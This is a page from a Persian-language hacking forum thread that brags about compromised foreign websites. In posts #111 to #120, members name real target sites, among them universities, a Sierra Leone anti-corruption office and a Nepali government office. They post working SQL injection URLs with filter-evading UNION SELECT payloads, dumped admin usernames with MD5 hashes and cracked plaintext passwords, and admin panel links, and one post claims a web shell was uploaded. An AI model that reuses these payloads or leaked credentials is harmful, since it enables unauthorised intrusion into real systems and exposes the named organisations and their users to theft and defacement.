پرش به


تصویر

دیتابیس سایت های مورد نفوذ قرار گرفته (خارجی)

اختصاصی

 • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
217 پاسخ برای این موضوع

#111 ارسالی 07 ژوئیه 2016 - 01:11

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

تارگت :

http://www.dmch.edu

لاگین :

http://www.dmch.edu/admin

لینک اینجکت :

http://www.dmch.edu/news.php?ID=-25%27+/*!50000UNION*/+SELECT+/*!50000grOup_coNcat(0x20557365726e616d65203a20,username,0x2050617373776f7264203a20,password,0x3c62723e)*/,2,3,4+/*!50000from*/+admin_user_management--+
Username : admin Password : 21232f297a57a5a743894a0e4a801fc3
, Username : dmchpro Password : 37482ba49948ad4332e50112a25fd959
, Username : nitin Password : 89fd776e19acd8ddfe55455a62391dad
, Username : saatchi Password : 608eea2fbd7f1e4f6182fdbabb7144ed
, Username : deanoffice Password : a35caa79ca603678942320fe3b4a729d

پسورد های هش شده (کرک) :

21232f297a57a5a743894a0e4a801fc3 MD5 : admin

37482ba49948ad4332e50112a25fd959 MD5 : bingo!@#abc

89fd776e19acd8ddfe55455a62391dad MD5 : housesun464!@#

608eea2fbd7f1e4f6182fdbabb7144ed MD5 : saatchi

a35caa79ca603678942320fe3b4a729d MD5 : dmch123!@#

 

موفق باشید./


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#112 ارسالی 07 ژوئیه 2016 - 01:46

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

تارگت :

http://www.retajroyaleistanbul.com

لینک اینجکت :

http://www.retajroyaleistanbul.com/offer.php?id=-15%27+UNION+SELECT+1,0x20496e6a656374656420427920426c61636b776f6c665f4972616e,3,4,5,(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(members)%20where%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e206964203a20,id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password,0x3c68723e))))x),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+
id : 1 Username : istanbul Password : Nestle55%

Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#113 ارسالی 14 ژوئیه 2016 - 02:21

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 4 هفته قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown

Target :

http://www.jewishlifetv.com

Inject page :

http://www.jewishlif...icle.php?id=419


Username : adamb

Password : adamb479

 


image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


#114 ارسالی 15 ژوئیه 2016 - 03:45

Ormazd
+1,724
  OFFLINE
  تاریخ عضویت :
  24 دسامبر 2015
 • ORMAZD
 • Super Moderator
 • 294 ارسال
  Last Visit 5 روز قبل
 • Country :
 • Gender : Male

تارگت :

http://www.anticorruption.gov.sl/

لینک اینجکت:

http://www.anticorruption.gov.sl/show_news.php?id=-271%27/*!50000union*//*!50000select*/1,2,3,4,/*!50000grOup_conCat(user_name,0x3a,password,0x3a,user_type,0x3c62723e)*/,6,7,8,9/*!50000from*/ACC_admin_login--+

پنل ادمین :

http://www.anticorruption.gov.sl/admin


+ شلش هم قرار گرفت


به خیالشون که این تاج سرشونه تا همیشه
یادشون رفته که اون شاه که به صد مهره نمی باخت
تاج رو از سرش تو میدون لشکر پیاده انداخت
اونکه مارو بازی میده
اونیکه مهره رو چیده
اونیکه نه شاه نه سرباز
نه سیاه...........نه سفیده
از پس پرده نگاه کن


#115 ارسالی 16 ژوئیه 2016 - 11:32

Ormazd
+1,724
  OFFLINE
  تاریخ عضویت :
  24 دسامبر 2015
 • ORMAZD
 • Super Moderator
 • 294 ارسال
  Last Visit 5 روز قبل
 • Country :
 • Gender : Male

تارگت ::

http://dawathussalaf.net/

لینک اینجکت :

http://dawathussalaf.net/latest_post.php?id=-23%27/*!50000union*//*!50000select*/1,2,/*!50000grOup_conCat(varEmail,0x3a,varAdName,0x3a,varAdPass)*/,4,5/*!50000from*/adminlogin--+

یوزر 
 

kmsajid1@yahoo.com:admin2015dawathussalaf:*#r&MJUikg456MJUikg456rht756tyrht75622Thy22Thyikg45622MJ&MJUikg456rht75642Uikg456rht75642

پنل ادمین :

http://dawathussalaf.net/admin

به خیالشون که این تاج سرشونه تا همیشه
یادشون رفته که اون شاه که به صد مهره نمی باخت
تاج رو از سرش تو میدون لشکر پیاده انداخت
اونکه مارو بازی میده
اونیکه مهره رو چیده
اونیکه نه شاه نه سرباز
نه سیاه...........نه سفیده
از پس پرده نگاه کن


#116 ارسالی 20 ژوئیه 2016 - 01:39

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 4 هفته قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown

Target :

http://daiphatdat.com.vn

Inject page :

http://daiphatdat.co...t_detail&id=135

 

Username : Admin
Passwird : 5e26c7955984761189ed968314312555


image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


#117 ارسالی 20 ژوئیه 2016 - 04:27

Ormazd
+1,724
  OFFLINE
  تاریخ عضویت :
  24 دسامبر 2015
 • ORMAZD
 • Super Moderator
 • 294 ارسال
  Last Visit 5 روز قبل
 • Country :
 • Gender : Male

تارگت :

http://e-assessment.edu.in/

لینک اینجکت :

http://e-assessment.edu.in/page.php?id=3%27/*!50000union*//*!50000select*/1,2,3,/*!50000grOup_conCat(AdminUser,0x3a,AdminPassword)*//*!50000from*/adminuser--+

یوزر :

admin:8e5d7a262931708b4e3b0fc9c58bc4a1

پنل ادمین :

http://e-assessment.edu.in/admin/

به خیالشون که این تاج سرشونه تا همیشه
یادشون رفته که اون شاه که به صد مهره نمی باخت
تاج رو از سرش تو میدون لشکر پیاده انداخت
اونکه مارو بازی میده
اونیکه مهره رو چیده
اونیکه نه شاه نه سرباز
نه سیاه...........نه سفیده
از پس پرده نگاه کن


#118 ارسالی 20 ژوئیه 2016 - 04:29

Ormazd
+1,724
  OFFLINE
  تاریخ عضویت :
  24 دسامبر 2015
 • ORMAZD
 • Super Moderator
 • 294 ارسال
  Last Visit 5 روز قبل
 • Country :
 • Gender : Male

تارگت :

http://www.edudbc.gov.np

اینجکت :

http://www.edudbc.gov.np/tender_details.php?tid=-22731/*!50000Union*//*!50000selEct*/1,2,3,4,/*!50000unhex(hex(grOUp_coNCat(user_name,0x3a,pass_word,0x3a,user_level)))*/,6,7,8,9,10,11,12,13/*!50000frOm*/tbl_adminlogin

یوزر :

dudbc@admin2134:f12ff5f1ec6943d16ddf35c5a419e745

پنل ادمین :

http://www.edudbc.gov.np/admin/

به خیالشون که این تاج سرشونه تا همیشه
یادشون رفته که اون شاه که به صد مهره نمی باخت
تاج رو از سرش تو میدون لشکر پیاده انداخت
اونکه مارو بازی میده
اونیکه مهره رو چیده
اونیکه نه شاه نه سرباز
نه سیاه...........نه سفیده
از پس پرده نگاه کن


#119 ارسالی 21 ژوئیه 2016 - 09:45

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://www.betteroiltools.com
http://www.betteroiltools.com/pro.php?id=-8%20union%20select%201,group_concat%28user_name,0x3a,user_pass,0x3a,0x496e6a656374656420427920426c34636b205734726e696e6720%29,3,4,5,6+from+bet_user--
deathgun:PASSWORD
http://www.betteroiltools.com/login.php

تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#120 ارسالی 21 ژوئیه 2016 - 10:38

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://www.gpjajpur.org
www.gpjajpur.org/tender_details.php?id=-12' /*!50000union*/+select+1,admin_user,0x496e6a656374656420427920426c34636b205734726e696e67,admin_pass,5,6,7,8+from+ihm_admin limit 0,1--+

www.gpjajpur.org/tender_details.php?id=-12' /*!50000union*/+select+1,admin_user,0x496e6a656374656420427920426c34636b205734726e696e67,admin_pass,5,6,7,8+from+ihm_admin limit 1,1--+

www.gpjajpur.org/tender_details.php?id=-12' /*!50000union*/+select+1,admin_user,0x496e6a656374656420427920426c34636b205734726e696e67,admin_pass,5,6,7,8+from+ihm_admin limit 2,1--+
username:password

admin:admin@123

sangram:sangram

newadmin:admin@123تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


1 کاربر در حال خواندن این موضوع است

0 کاربر، 1 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP